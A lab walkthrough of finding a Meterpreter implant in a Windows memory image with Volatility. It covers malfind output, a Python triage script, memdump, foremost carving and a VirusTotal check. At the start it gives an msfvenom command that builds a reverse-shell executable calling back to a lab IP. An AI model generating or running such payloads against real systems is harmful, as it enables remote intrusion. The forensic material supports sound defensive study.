Notes from a Volatility memory-analysis walkthrough

Environment

  • Parrot ×1
  • Windows 2008 ×1

First, generate an msf payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.17.6 LPORT=4444 -a x64 -f exe -o /home/parrot/Desktop/1.exe

Copy it to the Windows 2008 machine, run it, then migrate the process


Then use DumpIt to take a full image of physical memory


The size of the resulting image depends on how much RAM the machine has: the more memory, the larger the file


Copy it back to Parrot and start the analysis

Analysis

The commands are as follows

volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw --profile=Win7SP1x64 malfind looks for processes that appear to have code injected into them. Strictly speaking, you should first run volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw imageinfo to determine which profile to use.

┌─[root@parrot]─[/home/parrot/Desktop]
└──╼ #volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw --profile=Win7SP1x64 malfind
Volatility Foundation Volatility Framework 2.6
Process: wvs_supervisor Pid: 1088 Address: 0x2e0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x002e0000 00 00 00 00 59 e9 ce cd 13 00 e8 f5 ff ff ff 00 ....Y...........
0x002e0010 00 00 00 00 00 00 00 e8 e8 ff ff ff 0a 00 2e 00 ................
0x002e0020 00 00 00 00 e8 db ff ff ff 17 00 2e 00 00 00 00 ................
0x002e0030 00 e8 ce ff ff ff 24 00 2e 00 00 00 00 00 e8 c1 ......$.........

0x002e0000 0000 ADD [EAX], AL
0x002e0002 0000 ADD [EAX], AL
0x002e0004 59 POP ECX
0x002e0005 e9cecd1300 JMP 0x41cdd8
0x002e000a e8f5ffffff CALL 0x2e0004
0x002e000f 0000 ADD [EAX], AL
0x002e0011 0000 ADD [EAX], AL
0x002e0013 0000 ADD [EAX], AL
0x002e0015 0000 ADD [EAX], AL
0x002e0017 e8e8ffffff CALL 0x2e0004
0x002e001c 0a00 OR AL, [EAX]
0x002e001e 2e0000 ADD [CS:EAX], AL
0x002e0021 0000 ADD [EAX], AL
0x002e0023 00e8 ADD AL, CH
0x002e0025 db DB 0xdb
0x002e0026 ff DB 0xff
0x002e0027 ff DB 0xff
0x002e0028 ff17 CALL DWORD [EDI]
0x002e002a 002e ADD [ESI], CH
0x002e002c 0000 ADD [EAX], AL
0x002e002e 0000 ADD [EAX], AL
0x002e0030 00e8 ADD AL, CH
0x002e0032 ce INTO
0x002e0033 ff DB 0xff
0x002e0034 ff DB 0xff
0x002e0035 ff2400 JMP DWORD [EAX+EAX]
0x002e0038 2e0000 ADD [CS:EAX], AL
0x002e003b 0000 ADD [EAX], AL
0x002e003d 00e8 ADD AL, CH
0x002e003f c1 DB 0xc1

Process: opsrv.exe Pid: 1140 Address: 0x670000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x00670000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x00670010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x00670020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x00670030 00 00 00 00 00 00 00 00 00 00 67 00 00 00 00 00 ..........g.....

0x00670000 0000 ADD [EAX], AL
0x00670002 0000 ADD [EAX], AL
0x00670004 0000 ADD [EAX], AL
0x00670006 0000 ADD [EAX], AL
0x00670008 0000 ADD [EAX], AL
0x0067000a 0000 ADD [EAX], AL
0x0067000c 0000 ADD [EAX], AL
0x0067000e 0000 ADD [EAX], AL
0x00670010 0000 ADD [EAX], AL
0x00670012 0000 ADD [EAX], AL
0x00670014 0000 ADD [EAX], AL
0x00670016 0000 ADD [EAX], AL
0x00670018 0000 ADD [EAX], AL
0x0067001a 0000 ADD [EAX], AL
0x0067001c 0000 ADD [EAX], AL
0x0067001e 0000 ADD [EAX], AL
0x00670020 0000 ADD [EAX], AL
0x00670022 0000 ADD [EAX], AL
0x00670024 0000 ADD [EAX], AL
0x00670026 0000 ADD [EAX], AL
0x00670028 0000 ADD [EAX], AL
0x0067002a 0000 ADD [EAX], AL
0x0067002c 0000 ADD [EAX], AL
0x0067002e 0000 ADD [EAX], AL
0x00670030 0000 ADD [EAX], AL
0x00670032 0000 ADD [EAX], AL
0x00670034 0000 ADD [EAX], AL
0x00670036 0000 ADD [EAX], AL
0x00670038 0000 ADD [EAX], AL
0x0067003a 670000 ADD [BX+SI], AL
0x0067003d 0000 ADD [EAX], AL
0x0067003f 00 DB 0x0

Process: explorer.exe Pid: 2616 Address: 0x25d0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 50, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x025d0000 fc 48 89 ce 48 81 ec 00 20 00 00 48 83 e4 f0 e8 .H..H......H....
0x025d0010 cc 00 00 00 41 51 41 50 52 48 31 d2 65 48 8b 52 ....AQAPRH1.eH.R
0x025d0020 60 48 8b 52 18 48 8b 52 20 51 56 48 0f b7 4a 4a `H.R.H.R.QVH..JJ
0x025d0030 48 8b 72 50 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c H.rPM1.H1..<a|.,

0x025d0000 fc CLD
0x025d0001 48 DEC EAX
0x025d0002 89ce MOV ESI, ECX
0x025d0004 48 DEC EAX
0x025d0005 81ec00200000 SUB ESP, 0x2000
0x025d000b 48 DEC EAX
0x025d000c 83e4f0 AND ESP, -0x10
0x025d000f e8cc000000 CALL 0x25d00e0
0x025d0014 41 INC ECX
0x025d0015 51 PUSH ECX
0x025d0016 41 INC ECX
0x025d0017 50 PUSH EAX
0x025d0018 52 PUSH EDX
0x025d0019 48 DEC EAX
0x025d001a 31d2 XOR EDX, EDX
0x025d001c 6548 DEC EAX
0x025d001e 8b5260 MOV EDX, [EDX+0x60]
0x025d0021 48 DEC EAX
0x025d0022 8b5218 MOV EDX, [EDX+0x18]
0x025d0025 48 DEC EAX
0x025d0026 8b5220 MOV EDX, [EDX+0x20]
0x025d0029 51 PUSH ECX
0x025d002a 56 PUSH ESI
0x025d002b 48 DEC EAX
0x025d002c 0fb74a4a MOVZX ECX, WORD [EDX+0x4a]
0x025d0030 48 DEC EAX
0x025d0031 8b7250 MOV ESI, [EDX+0x50]
0x025d0034 4d DEC EBP
0x025d0035 31c9 XOR ECX, ECX
0x025d0037 48 DEC EAX
0x025d0038 31c0 XOR EAX, EAX
0x025d003a ac LODSB
0x025d003b 3c61 CMP AL, 0x61
0x025d003d 7c02 JL 0x25d0041
0x025d003f 2c DB 0x2c

Process: explorer.exe Pid: 2616 Address: 0x2610000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 38, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x02610000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ..............
0x02610010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0x02610020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x02610030 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 ................

0x02610000 4d DEC EBP
0x02610001 5a POP EDX
0x02610002 90 NOP
0x02610003 0003 ADD [EBX], AL
0x02610005 0000 ADD [EAX], AL
0x02610007 000400 ADD [EAX+EAX], AL
0x0261000a 0000 ADD [EAX], AL
0x0261000c ff DB 0xff
0x0261000d ff00 INC DWORD [EAX]
0x0261000f 00b800000000 ADD [EAX+0x0], BH
0x02610015 0000 ADD [EAX], AL
0x02610017 004000 ADD [EAX+0x0], AL
0x0261001a 0000 ADD [EAX], AL
0x0261001c 0000 ADD [EAX], AL
0x0261001e 0000 ADD [EAX], AL
0x02610020 0000 ADD [EAX], AL
0x02610022 0000 ADD [EAX], AL
0x02610024 0000 ADD [EAX], AL
0x02610026 0000 ADD [EAX], AL
0x02610028 0000 ADD [EAX], AL
0x0261002a 0000 ADD [EAX], AL
0x0261002c 0000 ADD [EAX], AL
0x0261002e 0000 ADD [EAX], AL
0x02610030 0000 ADD [EAX], AL
0x02610032 0000 ADD [EAX], AL
0x02610034 0000 ADD [EAX], AL
0x02610036 0000 ADD [EAX], AL
0x02610038 0000 ADD [EAX], AL
0x0261003a 0000 ADD [EAX], AL
0x0261003c f00000 LOCK ADD [EAX], AL
0x0261003f 00 DB 0x0

Process: explorer.exe Pid: 2616 Address: 0x2920000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 57, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x02920000 4d 5a 41 52 55 48 89 e5 48 83 ec 20 48 83 e4 f0 MZARUH..H...H...
0x02920010 e8 00 00 00 00 5b 48 81 c3 23 5b 00 00 ff d3 48 .....[H..#[....H
0x02920020 81 c3 c8 ae 02 00 48 89 3b 49 89 d8 6a 04 5a ff ......H.;I..j.Z.
0x02920030 d0 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 ................

0x02920000 4d DEC EBP
0x02920001 5a POP EDX
0x02920002 41 INC ECX
0x02920003 52 PUSH EDX
0x02920004 55 PUSH EBP
0x02920005 48 DEC EAX
0x02920006 89e5 MOV EBP, ESP
0x02920008 48 DEC EAX
0x02920009 83ec20 SUB ESP, 0x20
0x0292000c 48 DEC EAX
0x0292000d 83e4f0 AND ESP, -0x10
0x02920010 e800000000 CALL 0x2920015
0x02920015 5b POP EBX
0x02920016 48 DEC EAX
0x02920017 81c3235b0000 ADD EBX, 0x5b23
0x0292001d ffd3 CALL EBX
0x0292001f 48 DEC EAX
0x02920020 81c3c8ae0200 ADD EBX, 0x2aec8
0x02920026 48 DEC EAX
0x02920027 893b MOV [EBX], EDI
0x02920029 49 DEC ECX
0x0292002a 89d8 MOV EAX, EBX
0x0292002c 6a04 PUSH 0x4
0x0292002e 5a POP EDX
0x0292002f ffd0 CALL EAX
0x02920031 0000 ADD [EAX], AL
0x02920033 0000 ADD [EAX], AL
0x02920035 0000 ADD [EAX], AL
0x02920037 0000 ADD [EAX], AL
0x02920039 0000 ADD [EAX], AL
0x0292003b 00f0 ADD AL, DH
0x0292003d 0000 ADD [EAX], AL
0x0292003f 00 DB 0x0

Process: explorer.exe Pid: 2616 Address: 0x3e10000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x03e10000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x03e10010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x03e10020 00 00 e1 03 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x03e10030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0x03e10000 0000 ADD [EAX], AL
0x03e10002 0000 ADD [EAX], AL
0x03e10004 0000 ADD [EAX], AL
0x03e10006 0000 ADD [EAX], AL
0x03e10008 0000 ADD [EAX], AL
0x03e1000a 0000 ADD [EAX], AL
0x03e1000c 0000 ADD [EAX], AL
0x03e1000e 0000 ADD [EAX], AL
0x03e10010 0000 ADD [EAX], AL
0x03e10012 0000 ADD [EAX], AL
0x03e10014 0000 ADD [EAX], AL
0x03e10016 0000 ADD [EAX], AL
0x03e10018 0000 ADD [EAX], AL
0x03e1001a 0000 ADD [EAX], AL
0x03e1001c 0000 ADD [EAX], AL
0x03e1001e 0000 ADD [EAX], AL
0x03e10020 0000 ADD [EAX], AL
0x03e10022 e103 LOOPZ 0x3e10027
0x03e10024 0000 ADD [EAX], AL
0x03e10026 0000 ADD [EAX], AL
0x03e10028 0000 ADD [EAX], AL
0x03e1002a 0000 ADD [EAX], AL
0x03e1002c 0000 ADD [EAX], AL
0x03e1002e 0000 ADD [EAX], AL
0x03e10030 0000 ADD [EAX], AL
0x03e10032 0000 ADD [EAX], AL
0x03e10034 0000 ADD [EAX], AL
0x03e10036 0000 ADD [EAX], AL
0x03e10038 0000 ADD [EAX], AL
0x03e1003a 0000 ADD [EAX], AL
0x03e1003c 0000 ADD [EAX], AL
0x03e1003e 0000 ADD [EAX], AL

Process: explorer.exe Pid: 2616 Address: 0x3e90000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 16, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x03e90000 41 ba 80 00 00 00 48 b8 38 a1 d6 fd fe 07 00 00 A.....H.8.......
0x03e90010 48 ff 20 90 41 ba 81 00 00 00 48 b8 38 a1 d6 fd H...A.....H.8...
0x03e90020 fe 07 00 00 48 ff 20 90 41 ba 82 00 00 00 48 b8 ....H...A.....H.
0x03e90030 38 a1 d6 fd fe 07 00 00 48 ff 20 90 41 ba 83 00 8.......H...A...

0x03e90000 41 INC ECX
0x03e90001 ba80000000 MOV EDX, 0x80
0x03e90006 48 DEC EAX
0x03e90007 b838a1d6fd MOV EAX, 0xfdd6a138
0x03e9000c fe07 INC BYTE [EDI]
0x03e9000e 0000 ADD [EAX], AL
0x03e90010 48 DEC EAX
0x03e90011 ff20 JMP DWORD [EAX]
0x03e90013 90 NOP
0x03e90014 41 INC ECX
0x03e90015 ba81000000 MOV EDX, 0x81
0x03e9001a 48 DEC EAX
0x03e9001b b838a1d6fd MOV EAX, 0xfdd6a138
0x03e90020 fe07 INC BYTE [EDI]
0x03e90022 0000 ADD [EAX], AL
0x03e90024 48 DEC EAX
0x03e90025 ff20 JMP DWORD [EAX]
0x03e90027 90 NOP
0x03e90028 41 INC ECX
0x03e90029 ba82000000 MOV EDX, 0x82
0x03e9002e 48 DEC EAX
0x03e9002f b838a1d6fd MOV EAX, 0xfdd6a138
0x03e90034 fe07 INC BYTE [EDI]
0x03e90036 0000 ADD [EAX], AL
0x03e90038 48 DEC EAX
0x03e90039 ff20 JMP DWORD [EAX]
0x03e9003b 90 NOP
0x03e9003c 41 INC ECX
0x03e9003d ba DB 0xba
0x03e9003e 83 DB 0x83
0x03e9003f 00 DB 0x0

Process: explorer.exe Pid: 2616 Address: 0x4360000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 106, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x04360000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ..............
0x04360010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0x04360020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x04360030 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ................

0x04360000 4d DEC EBP
0x04360001 5a POP EDX
0x04360002 90 NOP
0x04360003 0003 ADD [EBX], AL
0x04360005 0000 ADD [EAX], AL
0x04360007 000400 ADD [EAX+EAX], AL
0x0436000a 0000 ADD [EAX], AL
0x0436000c ff DB 0xff
0x0436000d ff00 INC DWORD [EAX]
0x0436000f 00b800000000 ADD [EAX+0x0], BH
0x04360015 0000 ADD [EAX], AL
0x04360017 004000 ADD [EAX+0x0], AL
0x0436001a 0000 ADD [EAX], AL
0x0436001c 0000 ADD [EAX], AL
0x0436001e 0000 ADD [EAX], AL
0x04360020 0000 ADD [EAX], AL
0x04360022 0000 ADD [EAX], AL
0x04360024 0000 ADD [EAX], AL
0x04360026 0000 ADD [EAX], AL
0x04360028 0000 ADD [EAX], AL
0x0436002a 0000 ADD [EAX], AL
0x0436002c 0000 ADD [EAX], AL
0x0436002e 0000 ADD [EAX], AL
0x04360030 0000 ADD [EAX], AL
0x04360032 0000 ADD [EAX], AL
0x04360034 0000 ADD [EAX], AL
0x04360036 0000 ADD [EAX], AL
0x04360038 0000 ADD [EAX], AL
0x0436003a 0000 ADD [EAX], AL
0x0436003c 0001 ADD [ECX], AL
0x0436003e 0000 ADD [EAX], AL

We can see that process 2616 (explorer.exe) has several private PAGE_EXECUTE_READWRITE regions, two of which start with an MZ header, so dump it. One caveat when reading the listing: the profile is x64 but the disassembly is decoded in 32-bit mode, so the 0x48 bytes shown as DEC EAX at 0x25d0000 are really REX.W prefixes on 64-bit instructions.
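As an added example (not from the original post or from the Volatility project), a small Python triage script that parses malfind's text output in the layout shown above and ranks PIDs for memdump. The sample input is constructed from three of the regions in the run above, and the 16-page "sizeable region" threshold is an assumption.

```python
import re

# Constructed sample in malfind's own text layout (Volatility 2.6): three regions from the run
# above with one hexdump row each; the Vad Tag and disassembly rows are omitted for brevity.
SAMPLE = """Volatility Foundation Volatility Framework 2.6
Process: opsrv.exe Pid: 1140 Address: 0x670000
Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x00670000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
Process: explorer.exe Pid: 2616 Address: 0x25d0000
Flags: CommitCharge: 50, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x025d0000 fc 48 89 ce 48 81 ec 00 20 00 00 48 83 e4 f0 e8 .H..H......H....
Process: explorer.exe Pid: 2616 Address: 0x2610000
Flags: CommitCharge: 38, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x02610000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ..............
"""

HEADER = re.compile(r"^Process: (\S+) Pid: (\d+) Address: (0x[0-9a-f]+)$")
FLAGS = re.compile(r"CommitCharge: (\d+)")
# A hexdump row carries exactly 16 space-separated byte pairs; disassembly rows never do.
HEXROW = re.compile(r"^0x[0-9a-f]{8} ((?:[0-9a-f]{2} ){16})")

def parse_regions(text):
    """Yield one dict per malfind region: process, pid, address, committed pages, first bytes."""
    region = None
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            if region: yield region
            region = {"process": m.group(1), "pid": int(m.group(2)),
                      "address": int(m.group(3), 16), "commit": 0, "head": b""}
        elif region is not None:
            f, h = FLAGS.search(line), HEXROW.match(line)
            if f:
                region["commit"] = int(f.group(1))
            elif h and len(region["head"]) < 64:
                region["head"] += bytes.fromhex(h.group(1))
    if region: yield region

def triage(text, min_commit=16):
    """Per PID: private RWX regions, how many start with an MZ header, how many are sizeable."""
    summary = {}
    for r in parse_regions(text):
        s = summary.setdefault(r["pid"], {"process": r["process"], "regions": 0, "mz": 0, "large": 0})
        s["regions"] += 1
        s["mz"] += r["head"][:2] == b"MZ"        # a PE image living in anonymous RWX memory
        s["large"] += r["commit"] >= min_commit  # one-page stubs like 0x670000 score nothing
    return summary

def dump_candidates(text):  # PIDs worth passing to memdump -p: any MZ-headed or sizeable RWX region
    return sorted(pid for pid, s in triage(text).items() if s["mz"] or s["large"])
```

Feed it the saved output of a full malfind run (`volatility ... malfind > malfind.txt`) and pass each returned PID to memdump as the post does for 2616.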

┌─[root@parrot]─[/home/parrot/Desktop]
└──╼ #volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw --profile=Win7SP1x64 memdump -p 2616 -D /home/parrot/Desktop/dump/
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing explorer.exe [ 2616] to 2616.dmp

At this point, uploading the dmp file to VT usually produces no detection; the file is simply too large


Carve it with foremost and look again

┌─[parrot@parrot]─[~/Desktop/dump]
└──╼ $foremost -i 2616.dmp
Processing: 2616.dmp
|*****|


foremost has already sorted the carved files by type; go straight to the dll folder


Upload to VT

meterpreter is now detected